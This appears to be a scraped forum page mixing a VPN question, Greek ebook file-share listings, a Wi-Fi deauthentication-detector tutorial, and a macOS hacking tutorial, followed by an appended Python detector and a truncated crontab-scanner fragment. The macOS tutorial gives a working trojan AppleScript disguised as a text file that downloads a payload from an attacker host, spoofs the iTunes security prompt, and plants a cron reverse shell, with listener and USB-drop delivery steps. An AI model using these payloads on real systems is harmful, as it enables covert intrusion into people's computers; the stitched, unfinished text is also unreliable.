
de4d_R1n63r

Hello,

I want to move abroad and I'm thinking it would be a good idea to buy an effective VPN!

What do you recommend?

Thanks in advance! :)

AplexTM

Create an account or sign in to see it

  • Messages

    • dionysos
      THE WELLS OF HELL - GRAHAM MASTERTON


      If the Devil does not exist, then man must create him, in his own image and likeness (Dostoevsky). New Milford, Connecticut, is a small, quiet town where almost nothing ever happens, until one night the water in the wells takes on a sickly yellowish tint... A little boy is found dead under bizarre circumstances and his parents disappear, while rumours begin to spread that scaly crab-like creatures are lurking in the dark... Beneath the town an ancient power is awakening again, demanding new victims to swell the armies of a race that springs straight out of the Wells of Hell.


      Author: Masterton Graham
      Original title: The Wells of Hell
      Category: science fiction
      Pages: 299
      Publisher: ΟΞΥ
      Language: Greek
      Edition: 2018
      Translation: ΜΑΡΙΑ ΜΟΥΝΤΟΚΑΛΑΚΗ
      File format: pdf
      Zip file size: 16.37MB



    • dionysos
      SECRETS TO THE GRAVE - TAMI HOAG


      A mother is murdered. A child's heart breaks. Only one woman can uncover the truth. A chilling phone call mobilises the emergency services: "My daddy hit my mommy," says a child's voice. Marissa Fordham is found brutally murdered, with her four-year-old daughter Haley resting her little head on her mother's bloodied chest. With such a shocking witness, finding the killer should be child's play. Yet no one knows who Haley's father is, and she is not going to talk about him. Anne Leone, a court-appointed child advocate, realises that many secrets lie behind this story. More than anyone could imagine. Anne, her husband Vince, an agent with the FBI's Behavioral Science Unit, and Detective Tony Mendez begin to dig deep into Marissa Fordham's life. But the clues are few and unconnected. Everything suggests that the dead woman has taken her secrets to the grave. Until a discovery overturns everything and puts Anne and Haley in a killer's sights: Marissa Fordham never existed.


      Original title: SECRETS TO THE GRAVE
      Subject: LITERATURE / FOREIGN FICTION / U.S.A.
      Pages: 546
      Publisher: BELL
      Language: Greek
      Publication date: November 2015
      Translation: ΠΑΛΜΥΡΑ ΙΣΜΥΡΙΔΟΥ
      File format: pdf
      Zip file size: 24.10MB
      Credits: Manitsa



    • dionysos
      STORM IN CHESTNUT SEASON (Φουρτούνα τον καιρό της καστανιάς) - ENGIN AKTEL


      The story takes place on the island of Antigoni, one of the loveliest of the Princes' Islands, known for its exceptional natural beauty and the cosmopolitan character of its inhabitants. The main force shaping the islanders' lives is the sea, but so too are the love and hatred that mark human relationships in this small local community of the 1940s. A novel at once lyrical and epic, of particular interest to Greek readers, Storm in Chestnut Season carries the reader to worlds and emotions that will be remembered for a long time.
      Little one, welcome to our world. This event will mean your end, but also my salvation. Please, do not look at me as though I were some tyrant. Just as you, in order to survive, are obliged to eat the chub mackerel, the sprats, the anchovies, so I too am obliged to eat you. The most ferocious beings in this world are we humans. Perhaps your mother taught you that.
      Or she did not have time to teach you, because in the meantime she had been hooked on the end of a hand-line or trapped in some net.
      That is how the world survives... Everything is a matter of food...


      Language: Greek
      Pages: 368
      Publisher: ΚΑΣΤΑΝΙΩΤΗΣ
      Edition: 2010
      Translation: ΣΤΕΛΙΟΣ ΡΟΪΔΗΣ
      File format: pdf
      Zip file size: 13.00MB



    • CyberKid
      The most common Wi-Fi jamming attacks leverage deauthentication and disassociation packets to attack networks. This allows a low-cost ESP8266-based device programmed in Arduino to detect and classify Wi-Fi denial-of-service attacks by lighting a different color LED for each type of packet. The pattern of these colors can also allow us to fingerprint the tool being used to attack the network.

      Types of Jamming Attacks

      Jammers used in electronic warfare typically require equipment that overwhelms the signal of the target with radio energy, making it impossible to distinguish between the signal and the noise being introduced to the channel the target is using to communicate. This kind of jamming is popular because it works, but it also requires specialized equipment that is banned or heavily regulated in most countries. Another type of jamming attempts to send messages that force the target to be disconnected from the network they are connected to, rather than drowning out a target's signal by trying to overwhelm it. You might think this kind of attack would only work if you are connected to the network, but this is where WPA has a severe flaw. Because so-called management frames are not encrypted, it is possible to send disruptive messages from outside the network which cause people inside the network to be unable to connect.

      Deauthentication Packets

      The most common way this sort of attack is done is with deauthentication packets. These are a type of "management" frame responsible for disconnecting a device from an access point. Forging these packets is the key to hacking many Wi-Fi networks, as you can forcibly disconnect any client from the network at any time. The ease with which this can be done is somewhat frightening, and it is often done as part of gathering a WPA handshake for cracking.

      Aside from momentarily using this disconnection to harvest a handshake to crack, you can also just let those deauths keep coming, which has the effect of peppering the client with deauth packets seemingly from the network they are connected to. Because these frames aren't encrypted, many programs take advantage of management frames by forging them and sending them to either one or all devices on a network.

      Disassociation Packets

      Disassociation packets are another type of management frame that is used to disconnect a node (meaning any device, like a laptop or cell phone) from a nearby access point. The difference between deauthentication and disassociation frames is primarily that an AP looking to disconnect a rogue device would send a deauthentication packet to inform the device it has been disconnected from the network, whereas a disassociation packet is used to disconnect any nodes when the AP is powering down, rebooting, or leaving the area.

      Common Wi-Fi Denial of Service Tools

      There are many different tools to attack Wi-Fi networks, and many of them just automate more basic tools like Aireplay-ng and MDK3. We've covered both using and detecting both tools before, but in this example, we'll be setting a few design goals for detecting attacks against a network. To do that, we need to understand the way each works to effectively jam a Wi-Fi network.

      Aireplay-ng is often used to disconnect clients momentarily to obtain a Wi-Fi handshake, and it uses forged deauthentication packets to disconnect any networks or clients the user specifies, either with a set number of deauthentication packets or a continuous stream. It's also used in frameworks like Airgeddon, which allow the results of scans to automatically be fed into Aireplay to actively attack any networks discovered in an area in real time.

      MDK3 uses a blend of disassociation and deauthentication packets, initially having a slower onset than an Aireplay-ng attack. This attack is also used in frameworks like Airgeddon, and it can be differentiated by the alternating pattern of deauthentication and disassociation packets it sends.

      Tweaking the Deauth Detector

      To design a detector, I looked for a script for the NodeMCU to base our design on. I found Spacehuhn's DeauthDetector, which is a sketch in Arduino for ESP8266 devices like the NodeMCU that turns on an LED when a certain number of deauthentication or disassociation packets are detected. This is another of Spacehuhn's excellent designs, and you should check out his website (disable ad blockers) to see more of his ESP8266-based projects.

      Inside the DeauthDetector code, I found exactly what I needed to use an LED to show the type of attack underway, rather than just turning on a light when an attack is present.

          if(buf[12] == 0xA0 || buf[12] == 0xC0){

      This line may look similar if you followed our guide to using Wireshark to do the same thing. That's because the capture filter we used to find deauthentication and disassociation packets looks at the same elements, so we can split this code that looks for both into two different sections, each managing a variable that tracks one kind of packet and turning on a corresponding LED to alert the user.

      What You'll Need

      To build this detector, you'll need a NodeMCU or ESP8266-based device. You'll also need a computer running Arduino IDE to program it, and either a three-color (RGB), four-pin LED or at least two LEDs to indicate when a packet of each type is detected. You'll need a breadboard to wire this all together as well, and it's recommended you use a resistor or potentiometer to avoid burning out your LED.

      Here's a list of what I ended up using:

        • ESP8266 NodeMCU CP2102 development board wireless module (less than $6 per unit)
        • Solderless breadboard kit with jumper wires (around $11, but you can probably find a single breadboard with a few jumpers for less)
        • Tricolor LED (around $9 for a bunch, but you can get just one at a local store for super cheap)
        • Micro-USB cable (you probably already have one of these)
        • Resistors (optional, if you want the LED to last longer)

      Step 1: Download & Configure Arduino IDE

      The free, cross-platform Arduino IDE will allow us to quickly prototype what we need. Arduino IDE (the IDE stands for "integrated development environment") allows you to quickly write and upload scripts to Arduino-like microcontroller devices. You can download the Arduino IDE from the official website.

      Once it's installed, you'll need to click on the "Arduino" drop-down menu, then select "Preferences." Next, paste the following URL into the Additional Boards Manager URLs field. Click "OK" to continue.

          http://arduino.esp8266.com/stable/package_esp8266com_index.json

      Next, you'll need to add the NodeMCU to the Boards Manager. To do this, you'll need to click on "Tools," then hover over the "Board" section to see the drop-down list of supported boards. At the top, click "Boards Manager" to open the window that will allow us to add more boards.

      When the Boards Manager window opens, type "esp8266" into the search bar. Select "esp8266" by "ESP8266 Community," and install it to add support for the NodeMCU to your Arduino IDE. Once this is done, you should be ready to program your NodeMCU.

      Plug your NodeMCU into your breadboard and your NodeMCU into the computer. When you click on "Tools," you should see the correct port auto-selected. Select the "NodeMCU 1.0." If you're using a bad cable, the port may not show up, so if you don't see anything after you've completed the other steps, try another cable first.

      Step 2: Download the DeauthDetector

      Now that we have our IDE set up, we can download Spacehuhn's DeauthDetector to get started modifying the code. You can download the original version here if you'd like to follow along, but I'll be using my forked version below for our example. In a terminal window, type the following to download the modified DeauthDetector, change to its directory, and list the contents.

          git clone https://github.com/skickar/DeauthDetector.git
          cd DeauthDetector
          ls

      Once inside the new folder containing the downloaded files, you'll see an INO sketch file and two libraries that we will need for the project to work. Open the INO file in Arduino IDE, then click on "Sketch" in the menu at the top. Select "Add File" to select the two libraries we downloaded along with the INO file. Make sure to add mac.cpp and mac.h or our code will fail.

      Once we have the library added, we can push the code to our NodeMCU, but let's take a look inside the code and see how it works.

      Step 3: Tweak the Deauth Detector Code

      First and most obviously, we have our main settings. There is a collection of definitions that dictate how the code functions. Here, we can define whether or not we want to channel hop or just stay on one channel by setting the "channelHopping" setting to "true." Depending on where we are, we can define the highest channel to scan to while channel hopping (Japan is 14, while the US only goes to 11), and the number of packets detected per minute at which we will decide an attack is underway. Because we are tweaking the detector, this won't be so important.

          //===== SETTINGS =====//
          #define channel 1           //the channel it should scan on (1-14)
          #define channelHopping true //scan on all channels
          #define maxChannel 13       //US = 11, EU = 13, Japan = 14
          #define ledPin 2            //led pin ( 2 = built-in LED)
          #define inverted false      // invert HIGH/LOW for the LED
          #define packetRate 3        //min. packets before it gets recognized as an attack

      Next, we have a series of variables which keep track of things in the script. I've added two variables to keep track of deauthentication and disassociation packets, creatively named "dissoc" and "deauth."

          #define scanTime 500 //scan time per channel in ms
          //Mac from;
          //Mac to;
          unsigned long c = 0;
          unsigned long deauth = 0;
          unsigned long dissoc = 0;
          unsigned long prevTime = 0;
          unsigned long curTime = 0;
          int curChannel = channel;

      Next, we have a sniffer function, and an "if" statement that adds to the "c" counter, which is counting how many deauthentication or disassociation packets we have received. I've commented this out because we will be tracking them individually.

          void sniffer(uint8_t *buf, uint16_t len) {
            /*
            if(buf[12] == 0xA0 || buf[12] == 0xC0){
              c++;
            }
            */

      Instead, we'll insert two "if" statements that will add to a cooldown timer. Whenever we detect disassociation packets, we'll turn on an LED by setting the cooldown timer to 500, and then subtract one from the timer each time we scan a packet that isn't a disassociation packet. This means the light will stay on continuously when an attack is underway and turn off as soon as the attack stops and normal traffic resumes. The same logic is true for deauthentication packets, which we track in the second "if" statement.

            if(buf[12] == 0xA0){      // disassociation frame
              dissoc = 500;
            }
            else if(buf[12] == 0xC0){ // deauthentication frame
              deauth = 500;
            }

      Now, we'll decide what happens when the packet doesn't match, meaning it's a normal Wi-Fi packet and not one we're looking for. To handle this, we'll use an "else" clause that says that if the cooldown timer for "deauth" or "dissoc" is equal to or greater than one, subtract one from the timer. Otherwise, if the timer is already at zero, do nothing.

            else{
              if (deauth >= 1){ deauth--; }
              if (dissoc >= 1){ dissoc--; }
            }
          }

      In our setup loop, we'll set up our pins for output mode and Spacehuhn's sniffer functions get to work scanning for packets. We specify we want to turn on pins D5, D6, and D7 with the pinMode(pin, mode) function, in this case turning the pins on for output mode. This code will let us control the LEDs from these pins.

          void setup() {
            Serial.begin(115200);
            wifi_set_opmode(STATION_MODE);
            wifi_promiscuous_enable(0);
            WiFi.disconnect();
            wifi_set_promiscuous_rx_cb(sniffer);
            wifi_set_channel(curChannel);
            wifi_promiscuous_enable(1);
            pinMode(D5, OUTPUT);
            pinMode(D6, OUTPUT);
            pinMode(D7, OUTPUT);
          }

      Now, we have our main loop, the part of the code that runs over and over again. In this section of the code, we define the time and define the logic that actually turns on the LEDs.

          void loop() {
            curTime = millis();
            if(curTime - prevTime >= scanTime){
              prevTime = curTime;

      In this section, we set up what happens depending on the value of our cooldown timer, which starts at zero but gets set to 500 each time there is a deauthentication or disassociation packet. Each is tracked separately, and one is subtracted from each every time a normal packet is detected if the cooldown timer isn't already zero. Here, we simply say that if the cooldown timer is one or more, turn on the LED by setting the corresponding pin high. Also included is the logic for inverting the LED, which you can set true or false at the beginning.

              if(deauth >= 1){
                if(inverted) digitalWrite(D5, LOW); else digitalWrite(D5, HIGH);
              }
              else{
                if(inverted) digitalWrite(D5, HIGH); else digitalWrite(D5, LOW);
              }
              if(dissoc >= 1){
                if(inverted) digitalWrite(D7, LOW); else digitalWrite(D7, HIGH);
              }
              else{
                if(inverted) digitalWrite(D7, HIGH); else digitalWrite(D7, LOW);
              }

      Finally, we say that if the value of the cooldown timer is "else" (in this case, less than one), to turn off the LED. This is the last of our modifications, and the last part of the code controls the channel hopping and sets the NodeMCU to scan on the next channel, assuming channel hopping is enabled.

              if(channelHopping){
                curChannel++;
                if(curChannel > maxChannel) curChannel = 1;
                wifi_set_channel(curChannel);
              }
            }
          }

      The final code should look like this:

          #include <ESP8266WiFi.h>
          #include "Mac.h"
          extern "C" {
            #include "user_interface.h"
          }

          //===== SETTINGS =====//
          #define channel 1           //the channel it should scan on (1-14)
          #define channelHopping true //scan on all channels
          #define maxChannel 13       //US = 11, EU = 13, Japan = 14
          #define ledPin 2            //led pin ( 2 = built-in LED)
          #define inverted false      // invert HIGH/LOW for the LED
          #define packetRate 3        //min. packets before it gets recognized as an attack
          #define scanTime 500        //scan time per channel in ms

          // cooldown counters: set to 500 by a matching frame, decremented by every other frame
          unsigned long deauth = 0;
          unsigned long dissoc = 0;
          unsigned long prevTime = 0;
          unsigned long curTime = 0;
          int curChannel = channel;

          // promiscuous-mode callback; buf[12] is the 802.11 frame control byte
          // (the SDK prefixes the frame with a 12-byte RxControl header)
          void sniffer(uint8_t *buf, uint16_t len) {
            if(buf[12] == 0xA0){      // disassociation frame
              dissoc = 500;
            }
            else if(buf[12] == 0xC0){ // deauthentication frame
              deauth = 500;
            }
            else{                     // any other frame lets the counters cool down
              if (deauth >= 1){ deauth--; }
              if (dissoc >= 1){ dissoc--; }
            }
          }

          void setup() {
            Serial.begin(115200);
            wifi_set_opmode(STATION_MODE);
            wifi_promiscuous_enable(0);
            WiFi.disconnect();
            wifi_set_promiscuous_rx_cb(sniffer);
            wifi_set_channel(curChannel);
            wifi_promiscuous_enable(1);
            pinMode(D5, OUTPUT); // deauthentication LED
            pinMode(D6, OUTPUT);
            pinMode(D7, OUTPUT); // disassociation LED
            Serial.println("starting!");
          }

          void loop() {
            curTime = millis();
            if(curTime - prevTime >= scanTime){
              prevTime = curTime;
              Serial.printf("deauth=%lu dissoc=%lu\n", deauth, dissoc);
              if(deauth >= 1){
                if(inverted) digitalWrite(D5, LOW); else digitalWrite(D5, HIGH);
              }
              else{
                if(inverted) digitalWrite(D5, HIGH); else digitalWrite(D5, LOW);
              }
              if(dissoc >= 1){
                if(inverted) digitalWrite(D7, LOW); else digitalWrite(D7, HIGH);
              }
              else{
                if(inverted) digitalWrite(D7, HIGH); else digitalWrite(D7, LOW);
              }
              if(channelHopping){
                curChannel++;
                if(curChannel > maxChannel) curChannel = 1;
                wifi_set_channel(curChannel);
              }
            }
          }

      When the modifications are complete (or when you're ready, since it's already done in our example), you can press the arrow icon in the top left of Arduino IDE to push your code to the NodeMCU.

      Step 4: Wire & Test the Modified DeauthDetector

      Once you have the code pushed to the NodeMCU, you can wire your four-pin, three-color RGB LED in one of two ways. Most direct is plugging it directly next to the D5, D6, D7, and ground pins on the mini breadboard. This works great, and probably won't burn out the LED, but to be safe, you may want to use a resistor in your design. To include a resistor, place it between the LED's ground pin and whichever ground pin you are using on the NodeMCU.

      Once this is wired, you should be ready to go! Follow our guides to using MDK3 and Aireplay-ng to fire off some hostile packets against a network you have permission to test, and see if the LED lights up in response. In addition, watch for patterns in the colors that appear, as they'll directly reflect the behavior of the program being used. You can check our guide on launching Wi-Fi denial of service attacks below. Be warned, these attacks are very illegal against networks you don't have permission to test, so make sure you have permission before doing so.

      More Info: Use MDK3 for Advanced Wi-Fi Jamming

      Handheld Wi-Fi Jamming Detector

      This tool is a great way of visualizing Wi-Fi attacks and allows anyone to see when an attack is present and what kind of Wi-Fi packets are involved with a minimum of work. Rather than needing Wireshark running to see what's going on around you, this simple project shows whether an attack is in progress and, if so, what kind of attack is being used.
    • CyberKid
      The latest macOS security update tries to make parts of the operating system difficult for hackers to access. Let's take a closer look at how this new feature works and what we can do to spoof the origin of an application attempting to access protected data.

      MacOS introduced some new security features in the recent Mojave 10.14 release. One feature identifies applications attempting to copy, modify, or use certain files and services. This feature will present the user with a security notification for applications attempting to access the location services, built-in camera, address book, microphone, and other sensitive data. Below is an example notification of this new feature in action.

      In the above GIF, an attacker is attempting to use a trojanized AppleScript that appears as an ordinary text file to modify protected data. The target is being social engineered into opening the file called "passwords.txt", which presumably contains content interesting enough to make them double-click the file. The first part of that payload opens an actual text file containing arbitrary data designed to make them believe the file is legitimate. The second part happens transparently in the background without the target's knowledge. This kind of attack is explained in greater detail in my "How to Create a Fake PDF Trojan with AppleScript" article.

      As we can see, Mojave identifies the nefarious activity happening in the background and immediately alerts the target user. This new security feature prevented part of the attack. Well done, Mojave, well done.

      This got me thinking about ways of circumventing this security feature. After a bit of trial and error, I formulated a simple payload that performs the following activity. This time it appears as if iTunes is requesting administrative access to the user's data. If the target clicks the "OK" button, the payload will execute.

      It's not uncommon for macOS (previously called "OS X") users to experience iTunes and App Store notifications, so this seemed like an ideal social engineering tactic. The other thing you'll notice is how much time there is between TextEdit and iTunes opening. The delay was added intentionally in an effort to further conceal the background activity. The goal is to execute the nefarious activity minutes, or even hours, after the target has opened the fake text file. The more time placed between clicking the file and executing the payload, the less likely the target is to suspect the fake passwords.txt file as the origin of the activity.

      Understanding the Attack

      Now that we know what the attack looks like, let's dive into the technical details. There are two AppleScripts used in this attack. The first AppleScript is disguised to appear as a normal text file and will open a real file to make the target believe it's legitimate. It will then immediately download, decompress, and execute a second AppleScript which embeds a persistent backdoor into macOS by attempting to add a cronjob. The use of a second AppleScript is how the application name in the security notification is changed (or spoofed). MacOS doesn't specify which iTunes application is requesting access to protected data, so any application we name "iTunes" will appear in the security notification as such.

      1. First AppleScript Technical Details

      Below is the Bash one-liner used in the first AppleScript. There are eight commands chained together here using the && and ; Bash operators. I'll explain each command individually, in order.

          do shell script "echo 'my password is 123456' > /tmp/passwords.txt && open /tmp/passwords.txt -a TextEdit && p='/tmp/iTunes'; curl -s http://1.2.3.4/iTunes.zip -o $p.zip && unzip $p.zip -d /tmp/ && chmod 7777 $p.app; sleep 60 && open -a iTunes.app && open $p.app"

        • do shell script "..." : This string is required at the start of AppleScripts to run Bash (encased in double-quotes) on the target's MacBook.
        • echo 'my password is 123456' > /tmp/passwords.txt : A new text file is created in the target's /tmp directory called passwords.txt. This is done using echo and should resemble the file name of the AppleScript file intended for the target (passwords.txt). I'm using a very simple string that reads "my password is 123456" in this example; however, it should be more elaborate in a real engagement.
        • open /tmp/passwords.txt -a TextEdit : After creating the text file, it will immediately open using the TextEdit application (-a). Presenting the target with legitimate content as soon as possible will help convince them the AppleScript is actually a text file. The following commands happen in the background, transparent to the target.
        • p='/tmp/iTunes' : The letter "p" is being used as a variable for /tmp/iTunes. The next few commands are now able to use $p to reference the variable. This is done to minimize the number of characters required in the following commands. In a real engagement, this file path might be much longer, so it makes sense to use a variable here.
        • curl -s http://1.2.3.4/iTunes.zip -o $p.zip : The second AppleScript (iTunes.zip), which contains the backdoor attempt, is silently (-s) downloaded from the attacker's system (1.2.3.4) and saved (-o) using the $p variable. This AppleScript is compressed to make downloading it from the attacker's server easy.
        • unzip $p.zip -d /tmp/ : The .zip is then decompressed using unzip and saved in the target's /tmp directory (-d). It's automatically given the "iTunes.app" file name and extension upon decompression.
        • chmod 7777 $p.app : The decompressed .app is given permission to execute in macOS using chmod.
        • ; : This semicolon between the chmod and sleep commands is possibly the single most important character in the entire payload. It will sever the chain of commands from the current process ID executed by the first (passwords.txt) AppleScript and begin an entirely new chain. This is how we're able to change the application name ("iTunes") in the macOS security notification. MacOS no longer recognizes or acknowledges the initial file (passwords.txt) opened by the target. At this point, it's no longer able to see which process actually executed the second AppleScript ("iTunes.app").
        • sleep 60 : To create doubt within the target, an arbitrary delay can be added before the execution. The value of "60" will introduce a sixty-second pause before performing the following commands in the chain. A much higher value (e.g., 3600) would put more time between when the target clicked on the first AppleScript and when the second is executed.
        • open -a iTunes.app : The real iTunes application (-a) is opened to legitimize the accompanying security notification.
        • open $p.app : Finally, the second AppleScript is executed using the "iTunes" file name and requests access to protected data.

      2. Second AppleScript Technical Details

      Below is the (much simpler) Bash script used in the second AppleScript.

          do shell script "echo '* * * * * bash -i >& /dev/tcp/1.2.3.4/9999 0>&1' | crontab -"

      Here, echo is piping (|) a bash one-liner into the crontab command. The Bash command will attempt to create a new TCP connection every sixty seconds to the attacker's machine (1.2.3.4) on port 9999. If successful, the target's MacBook will continue to attempt connections to the attacker's IP address. Readers interested in scheduling cronjobs at intervals other than sixty seconds should check out Ole Michelsen's article on using crontab in macOS.

      Step 1: Prepare the Netcat Listener for Incoming Connections

      The Netcat listener should be started in Kali or on a virtual private server in your control. This is where the target MacBook will connect to when the second AppleScript is executed. Use the below Netcat command to start the listener.

          nc -l -p 9999

        • nc -l : Netcat will open a listening (-l) port on every available interface. The listener will be available to all devices on your local network via your IP address (e.g., 192.168.0.xx).
        • -p 9999 : The port (-p) number (9999) is arbitrary and can be changed as needed.

      Step 2: Create the First AppleScript

      The following steps require Script Editor, a macOS-only scripting application designed to create AppleScripts. Readers who don't have access to a Mac computer to follow along should explore the Empire AppleScript Stager. Open Script Editor and enter the following text in a new document.

          do shell script "echo 'my password is 123456' > /tmp/passwords.txt && open /tmp/passwords.txt -a TextEdit && p='/tmp/iTunes'; curl -s http://1.2.3.4/iTunes.zip -o $p.zip && unzip $p.zip -d /tmp/ && chmod 7777 $p.app; sleep 60 && open -a iTunes.app && open $p.app"

      Click on "File" in the menu bar, then "Export." Save the script using the "Application" file format. Then, spoof the file extension and change the icon. Spoofing the file extension and creating file icons are methods better explained in my previous "How to Hack Mojave 10.14 with a Self-Destructing Payload" and "How to Create a Fake PDF Trojan with AppleScript" articles.

      Step 3: Create the Second ('iTunes') AppleScript

      To create the second AppleScript, open a new Script Editor window and enter:

          do shell script "echo '* * * * * bash -i >& /dev/tcp/1.2.3.4/9999 0>&1' | crontab -"

      Remember to change the attacker's address (1.2.3.4) to the local network IP address hosting the Netcat listener. If you opted to use a port other than "9999," be sure to reflect that in the above command as well. Then, "Export" the second AppleScript using the "Application" format with the "iTunes" file name. This is the file name the user will see in the security notification. Save it into a directory of your choosing. I'm using a new directory called "pythonServer" on my desktop. Don't worry about spoofing the file name or extension here. The target won't see this file, as it'll be downloaded and executed silently in the background.

      Step 4: Compress the Second ('iTunes') AppleScript

      Compressing the second AppleScript will make it easy to transport (or download) onto the target's MacBook. Right-click on the AppleScript and select the "Compress" option to create a .zip file.

      Step 5: Host the Second ('iTunes') AppleScript

      Now, we'll need to make the iTunes.zip downloadable to everyone on the network. Open a Terminal and use the below command to change into the directory where you saved the iTunes.zip.

          cd /Users/<username>/Desktop/pythonServer/

      Then, start a simple Python web server using the below command.

          python -m SimpleHTTPServer 80
          Serving HTTP on 0.0.0.0 port 80 ...

      The SimpleHTTPServer module (-m) will create a web server using port 80. Changing the below 1.2.3.4 address to your local IP address, this web server can be tested by navigating to the following URL using a web browser.

          http://1.2.3.4/iTunes.zip

      This Python Terminal must be kept open for the server to remain active.

      Step 6: Deliver the AppleScript to the Target

      The easiest method for social engineering a macOS target into opening malicious AppleScripts is by performing a USB flash drive drop attack. The matter of macOS' high susceptibility to USB flash drive drops is covered at length in my "How to Hack Mojave with a Self-Destructing Payload" article. Adding a key and labeling the USB flash drive will also help convince the target that someone unintentionally lost it. The USB flash drive containing the AppleScripts should be strategically placed somewhere your intended target will undoubtedly find it. This could be on their desk, front doorstep, or by slipping it into their purse or backpack when they're not looking.

      Sharing an AppleScript with a remote target is a lengthier process and hasn't been covered in a Null Byte article yet. Stay tuned for future articles where I'll cover how to do that in detail.

      Step 7: Improve the Attack (Optional)

      You can hardcode the .zip into the payload. In my example, the second AppleScript ("iTunes.zip") was downloaded to the target's MacBook using curl. However, if the target isn't connected to the internet when the first AppleScript (passwords.txt) is opened, the second would fail to download. To prevent such occurrences, it would be possible to base64 encode the .zip, embed the encoded data into the first AppleScript, and decode it on the target's machine when opened.

      Also, you can deploy a remote server. This tutorial focused on performing the attack on a local network, a Wi-Fi network shared with the target MacBook. Alternatively, it can be done without being connected to the target's Wi-Fi network, where Netcat and the second AppleScript are hosted on a virtual private server (VPS). There are benefits to using a VPS in this scenario. Most notably, the attacker would be able to control the target MacBook from anywhere in the world. Additionally, the attacker wouldn't need access to the target's Wi-Fi network when the AppleScripts were executed, so no degree of WPA2 hacking would be required. The use of a VPS grants a lot of freedom to the attacker and doesn't confine them to the target's Wi-Fi network.

      Final Thoughts

      Apple's new security features protect a small selection of files and directories but fail to provide full coverage of the operating system. While this protects the address book and photos from quickly being exfiltrated by an attacker, it doesn't protect very much outside of the address book or photos directories. It also doesn't prevent attackers from finding alternative ways of backdooring the operating system. For instance, this tutorial demonstrated a quick method for backdooring macOS by invoking the new security feature. Other methods, like the one used in my recent "How to Hack Mojave with a Self-Destructing Payload" article, go completely undetected by Apple's new security features.

      Furthermore, there's more than one way of accessing the MacBook's microphone, webcam, and browser passwords without alerting the target. I think all macOS users will appreciate Apple's latest attempts toward building a secure operating system, but don't be fooled by the hype. MacOS still has a long way to go.
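The DeauthDetector post above tests one byte of each sniffed frame (buf[12], the 802.11 frame control byte) and keeps two cooldown counters. The following added example, which is not code from the post, from Spacehuhn's sketch, or from the skickar fork, reproduces that logic in Python so it can be checked offline: it decodes the type/subtype bits of the frame control field, pulls the addresses and reason code out of deauthentication and disassociation frames, runs the same 500-count cooldown, and applies the post's fingerprinting heuristic (a pure deauth stream versus an alternating deauth/disassoc stream). The frames are constructed inline with struct and are not captured traffic; the labels "deauth-only" and "alternating" are this example's own names for the two patterns the post describes.

```python
"""802.11 management-frame classifier with DeauthDetector-style cooldown counters.
Added example: frames are constructed below, not captured from the air."""
import struct
from typing import Dict, List, Optional

# Management subtypes (frame control type 0) this detector cares about
MGMT_SUBTYPES = {0x8: "beacon", 0xA: "disassoc", 0xC: "deauth"}
COOLDOWN = 500  # the value the sketch writes into its counters


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_frame(subtype: int, dst: bytes, src: bytes, bssid: bytes,
                reason: Optional[int] = None, ftype: int = 0) -> bytes:
    """Minimal 24-byte 802.11 header plus an optional 2-byte reason code.
    Constructed test input; type 0 = management, type 2 = data."""
    fc0 = (subtype << 4) | (ftype << 2)           # protocol version 0
    hdr = struct.pack("<BBH6s6s6sH", fc0, 0x00, 0, dst, src, bssid, 0)
    body = struct.pack("<H", reason) if reason is not None else b""
    return hdr + body


def classify(frame: bytes) -> Dict[str, object]:
    """Decode the frame control byte the sketch reads as buf[12]; the ESP8266
    SDK prefixes a 12-byte RxControl header, here the frame starts at offset 0."""
    if len(frame) < 24:
        return {"kind": "runt"}
    fc0 = frame[0]
    ftype = (fc0 >> 2) & 0x3
    subtype = (fc0 >> 4) & 0xF
    if ftype == 0:
        kind = MGMT_SUBTYPES.get(subtype, "mgmt_other")
    elif ftype == 1:
        kind = "control"
    else:
        kind = "data"
    info: Dict[str, object] = {
        "kind": kind,
        "dst": mac_str(frame[4:10]),      # addr1
        "src": mac_str(frame[10:16]),     # addr2 (spoofed AP MAC in an attack)
        "bssid": mac_str(frame[16:22]),   # addr3
    }
    if kind in ("deauth", "disassoc") and len(frame) >= 26:
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return info


class CooldownDetector:
    """Two counters as in the sketch: a matching frame sets one to COOLDOWN,
    every other frame decrements both, and an LED is lit while a counter > 0."""

    def __init__(self) -> None:
        self.deauth = 0
        self.dissoc = 0
        self.seen: List[str] = []  # order of hostile frames, for fingerprinting

    def feed(self, frame: bytes) -> Dict[str, bool]:
        kind = classify(frame)["kind"]
        if kind == "disassoc":
            self.dissoc = COOLDOWN
            self.seen.append(kind)
        elif kind == "deauth":
            self.deauth = COOLDOWN
            self.seen.append(kind)
        else:
            self.deauth = max(0, self.deauth - 1)
            self.dissoc = max(0, self.dissoc - 1)
        return {"deauth_led": self.deauth > 0, "dissoc_led": self.dissoc > 0}

    def fingerprint(self) -> str:
        """The post's heuristic: deauth-only streams resemble aireplay-ng,
        alternating deauth/disassoc streams resemble mdk3. Heuristic only."""
        if not self.seen:
            return "none"
        kinds = set(self.seen)
        if kinds == {"deauth"}:
            return "deauth-only"
        if kinds == {"disassoc"}:
            return "disassoc-only"
        switches = sum(1 for a, b in zip(self.seen, self.seen[1:]) if a != b)
        return "alternating" if switches / (len(self.seen) - 1) >= 0.5 else "mixed"


def demo() -> Dict[str, str]:
    """Two constructed streams: 20 broadcast deauths, then 20 alternating frames."""
    ap = bytes.fromhex("02aabbccdd01")       # constructed, locally administered MACs
    client = bytes.fromhex("02aabbccdd02")
    bcast = b"\xff" * 6
    stream_a = CooldownDetector()
    for _ in range(20):
        stream_a.feed(build_frame(0xC, bcast, ap, ap, reason=7))
    stream_b = CooldownDetector()
    for i in range(20):
        stream_b.feed(build_frame(0xC if i % 2 == 0 else 0xA, client, ap, ap, reason=7))
    return {"stream_a": stream_a.fingerprint(), "stream_b": stream_b.fingerprint()}


if __name__ == "__main__":
    print(demo())
```

Reason code 7 ("class 3 frame received from nonassociated STA") is the value aireplay-ng is commonly seen to use, but the classifier does not depend on it; a real capture would be fed frame by frame into feed() exactly as the sketch's callback is.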
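The macOS post above persists with a crontab entry that opens a reverse shell every minute ("* * * * * bash -i >& /dev/tcp/1.2.3.4/9999 0>&1"). The following added example, which is not code from the post, parses the text that crontab -l prints, scores each entry against a small set of reverse-shell and remote-fetch indicators, and extracts the remote endpoint from a /dev/tcp path. The crontab text, the indicator list, the scoring threshold and the function names are this example's own constructions; the 1.2.3.4:9999 endpoint is the placeholder the post uses.

```python
"""Scan crontab text for reverse-shell style persistence.
Added example; SAMPLE_CRONTAB is constructed, not taken from a real host."""
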